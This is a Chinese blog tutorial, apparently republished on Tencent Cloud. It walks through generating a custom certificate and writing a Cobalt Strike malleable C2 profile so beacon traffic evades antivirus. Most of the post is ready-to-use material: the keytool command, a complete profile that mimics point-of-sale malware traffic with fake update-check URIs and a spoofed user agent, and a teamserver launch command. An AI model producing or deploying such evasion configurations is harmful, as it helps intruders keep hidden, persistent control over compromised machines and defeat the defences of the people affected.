Loading [MathJax]/jax/output/CommonHTML/config.js
前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
社区首页 >专栏 >渗透测试|CobaltStrike配置C2-profile文件【加密流量实现免杀】

渗透测试|CobaltStrike配置C2-profile文件【加密流量实现免杀】

作者头像
TRY博客-简单的网络技术
发布于 2022-09-08 03:49:32
发布于 2022-09-08 03:49:32
3.8K01
代码可运行
举报
运行总次数:1
代码可运行

至少我们曾经在一起过。

来自:一言

var xhr = new XMLHttpRequest(); xhr.open('get', 'https://v1.hitokoto.cn/'); xhr.onreadystatechange = function () { if (xhr.readyState === 4) { var data = JSON.parse(xhr.responseText); var hitokoto = document.getElementById('hitokoto'); hitokoto.innerText = data.hitokoto; } } xhr.send();

前言

CobaltStrike(简称‘cs’)自带了ssl证书,不过该证书已经被杀软标记了[aru_3],所以我们得生成自己的免费证书替换掉cs自带的证书,监听的时候选https的。

该操作从渣渣辉博客学到的[aru_14],偷一手干货,以下是我使用的cs版本,有需要的朋友欢迎进群下载哦~

证书生成

1.利用keytool生成自己的免费证书(可在kali上生成)

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
keytool -genkey -alias tryblog -keyalg RSA -validity 36500 -keystore tryblog.store

温馨提示

注意记得-alias后面的参数和-keystore后面的参数后面会用到C2-profile里面[aru_20]

接下来需要输入密码,一定要记得这串密码,后面会用到,不然到时候你需要自己回来重新生成下

注意:里面的内容随意填写,问你是否正确的时候输入y,然后回车后就成功生成了。证书就在当前目录下

创建C2.profile文件

1.新建一个文件,名叫c2.profile,加入以下内容

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
set sample_name "tryblog POS Malware";

set sleeptime "5000"; # use a ~30s delay between callbacks
set jitter    "10";    # throw in a 10% jitter

set useragent "Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0";

#设置证书,注意以下内容得和你之前生成的证书一样
https-certificate {
    set CN       "TRY"; 
    set O        "TRY";   
    set C        "TRY";
    set L        "TRY";
    set OU       "TRY";  
    set ST       "TRY";
    set validity "365";
}
#设置,修改成你的证书名称和证书密码
code-signer{
    set keystore "tryblog.store";
    set password "tryblog";
    set alias "tryblog";
}

#指定DNS beacon不用的时候指定到IP地址
set dns_idle "8.8.4.4";

#每个单独DNS请求前强制睡眠时间
set dns_sleep "0";

#通过DNS上载数据时主机名的最大长度[0-255]
set maxdns    "235";

http-post {
    set uri "/windebug/updcheck.php /aircanada/dark.php /aero2/fly.php /windowsxp/updcheck.php /hello/flash.php";

    client {
        header "Accept" "text/plain";
        header "Accept-Language" "en-us";
        header "Accept-Encoding" "text/plain";
        header "Content-Type" "application/x-www-form-urltrytryd";

        id {
            netbios;
            parameter "id";
        }

        output {
            base64;
            prepend "&op=1&id=vxeykS&ui=Josh @ PC&wv=11&gr=backoff&bv=1.55&data=";
            print;
        }
    }

    server {
        output {
            print;
        }
    }
}

http-get {
    set uri "/updates";

    client {
        metadata {
            netbiosu;
            prepend "user=";
            header "Cookie";
        }
    }

    server {
        header "Content-Type" "text/plain";

        output {
            base64;
            print;
        }
    }
}

在上面的生成命令中的alias以及keystore后面的字段对应好

验证证书

1.进入cs文件夹,将刚刚生成的证书,和创建的c2.profile文件复制进去。

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
./c2lint C2.profile       #命令后面跟你自己的c2文件

这样就基本成功了。

使用证书启动teamserver

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
nohup ./teamserver 1.1.2.3 123456 ./C2.profile &        #nohup就是把程序挂在后台运行

温馨提示

建议编辑teamserver文件,在最后把启动的端口修改一下,尽量别使用默认端口启动。[aru_21]

关于免杀

先说一下,不是说你换了ssl证书后生成的文件就直接免杀了[aru_22]。这个只是把流量进行加密,然后你要免杀的话还是要生成payload自己进行免杀的,不过这样以后免杀的效果会好很多,就这样吧,有什么问题欢迎进群讨论。

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2020-03-07,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
Malleable-C2-Profiles配置
在日常的渗透测试工作中,我们需要做很多的规避操作,因为我们所使用的C2工具等,可能早已被AV等防护软件所标记,所以我们需要订制我们的攻击工具。而这就引出了我们的今天的重点Malleable C2 ,Malleable C2 是 Cobalt Strike 的一项功能, 意为 "可定制的" 的 C2 服务器. Malleable C2 允许我们仅通过一个简单的配置文件来改变 Beacon 与 C2 通信时的流量特征与行为。
鸿鹄实验室
2021/04/15
1.5K0
Malleable-C2-Profiles配置
渗透测试信息收集技巧(8)——Cobalt Strike配置
Cobalt Strike是一款渗透测试软件,分为客户端与服务端,可以进行团队分布式操作。
zhouzhou的奇妙编程
2024/09/14
2050
CS如何配置通过CDN上线
CDN需要关闭缓存或开启开发模式,如果不关闭缓存,会出现执行命令,回不来返回内容以及机器超时。
HACK学习
2020/08/27
2.2K0
CS如何配置通过CDN上线
python在渗透测试中的免杀
将保存的python代码复制到目标主机,执行python文件 如下,成功得到会话。
逍遥子大表哥
2023/08/19
4800
python在渗透测试中的免杀
SpringCloud config配置文件加密
一、前言 配置文件中,有些敏感数据需要加密处理。 SpringCloud config server可以结合jce实现这个功能。 二、配置 下载jce http://www.oracle.com/t
叔叔
2018/04/11
1.9K0
SpringCloud config配置文件加密
流量加密之C2隐藏
文章地址:https://www.freebuf.com/articles/network/330713.html
亿人安全
2022/06/21
12.7K1
流量加密之C2隐藏
【红队APT】反朔源&流量加密&CS&MSF&证书指纹&C2项目&CDN域前置
在红蓝对抗或日常测试中会出现一种情况,当我们终于让目标机器上线后, 却因为明显的通信特征被安全设备检测到从而失去目标机器的控制权限, 这时就需要对Cobalt Strike或MSF的特征进行隐藏、对其通信流量进行混淆。
没事就要多学习
2024/07/18
2220
【红队APT】反朔源&流量加密&CS&MSF&证书指纹&C2项目&CDN域前置
Cobalt Strike隐藏特征与混淆流量
服务器禁ping从某种意义上来说,算是不存活的主机,但nmap是依然能够扫描出来的。 设置禁ping命令: vim /etc/sysctl.conf 打开后按i进入编辑模式,在任意位置新增以下内容 net.ipv4.icmp_echo_ignore_all=1
kam1
2022/03/08
3.3K0
Cobalt Strike隐藏特征与混淆流量
云函数隐藏C2爬坑记
// **坑点一:**要根据cs监听类型http/https在脚本内填入c2服务器地址
Khan安全团队
2022/01/05
2.3K1
Cobalt Strike特征隐藏和流量加密(CS服务器伪装)
测试成功 5.到cloudflare添加域名,并修改dns 开启自动HTTPS重写
R0A1NG
2022/02/19
3.4K0
Cobalt Strike特征隐藏和流量加密(CS服务器伪装)
红队 | 流量加密:使用OpenSSL进行远控流量加密
在红队进行渗透测试的后续渗透阶段为了扩大战果,往往需要进行横行渗透,反弹shell是再常见不过的事情了,在 《反弹Shell,看这一篇就够了》 这篇文章里,我总结了很多常见的反弹shell的方法。除了这些之外,我们还可以使用Metasploit或Cobalt Strike等工具获得目标的shell。但是这些反弹 shell 方式都有一个缺点,那就是 所有的流量都是明文传输的。
HACK学习
2021/05/14
3.2K0
某HW行动中的一次渗透测试
可以看到可以选择以什么身份登陆,而且选择学生登陆的时候,还可以选择年级。 抓包看下是否存在数据库交互:
Power7089
2020/12/11
1.3K0
某HW行动中的一次渗透测试
CobaltStrike使用CDN域前置并搭建Nginx前置代理
本文将介绍CobaltStrike配置CDN域前置,并搭建Nginx前置代理来隐藏自身。
Jumbo
2023/08/28
2K0
CobaltStrike使用CDN域前置并搭建Nginx前置代理
红队作业 | ​MSF和CS实战技巧汇总
其实就是内网穿透,使用frp做映射也能实现相同的效果,内网的中的Kali可以通过VSP访问到另外一个内网中。
Ms08067安全实验室
2022/04/06
1.1K0
红队作业 | ​MSF和CS实战技巧汇总
如何隐蔽你的C2
文章首发于安全客:https://www.anquanke.com/post/id/231448
谢公子
2022/01/20
1.9K0
如何隐蔽你的C2
实战填坑 | CS使用CDN隐藏C2
但在搭建域名+CDN隐藏版c2时楼主遇到了不少的坑,在这里顺着搭建的思路慢慢把踩的坑填上。
HACK学习
2021/06/24
4.8K0
实战填坑 | CS使用CDN隐藏C2
魔改Cobaltstrike该注意哪些?
本公众号提供的工具、教程、学习路线、精品文章均为原创或互联网收集,旨在提高网络安全技术水平为目的,只做技术研究,谨遵守国家相关法律法规,请勿用于违法用途,如果您对文章内容有疑问,可以尝试加入交流群讨论或留言私信,如有侵权请联系小编处理。
网络安全自修室
2023/12/28
3830
魔改Cobaltstrike该注意哪些?
cobaltstrike 流量隐藏
监听器配置填入地址 service-cv4vqio3-1307700818.sh.apigw.tencentcs.com
黑战士
2024/04/17
1970
渗透测试神器CobaltStrike使用教程
Cobalt Strike是一款渗透测试神器,常被业界人称为CS神器。Cobalt Strike已经不再使用MSF而是作为单独的平台使用,它分为客户端与服务端,服务端是一个,客户端可以有多个,可被团队进行分布式协团操作。 Cobalt Strike集成了端口转发、扫描多模式端口Listener、Windows exe程序生成、Windows dll动态链接库生成、java程序生成、office宏代码生成,包括站点克隆获取浏览器的相关信息等。
雾海梦曦
2022/11/12
4.2K1
渗透测试神器CobaltStrike使用教程
nginx+tomcat配置ssl实现https
仅为tomcat时,进入tomcat目录/conf/server.xml中,添加如下代码(具体参数请根据实际情况修改),并重启tomcat即可。若使用自定义的证书查看时使用ie为佳,chrome会直接屏蔽域名访问的链接(提示"此网站无法提供安全连接",以致纠结好长时间以为自己配置失败了呢= =),ip访问一般都会提示非安全链接,点击忽略继续就好。
WindCoder
2018/09/20
4.6K0
nginx+tomcat配置ssl实现https
相关推荐
Malleable-C2-Profiles配置
更多 >
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档
查看详情【社区公告】 技术创作特训营有奖征文
本文部分代码块支持一键运行,欢迎体验
本文部分代码块支持一键运行,欢迎体验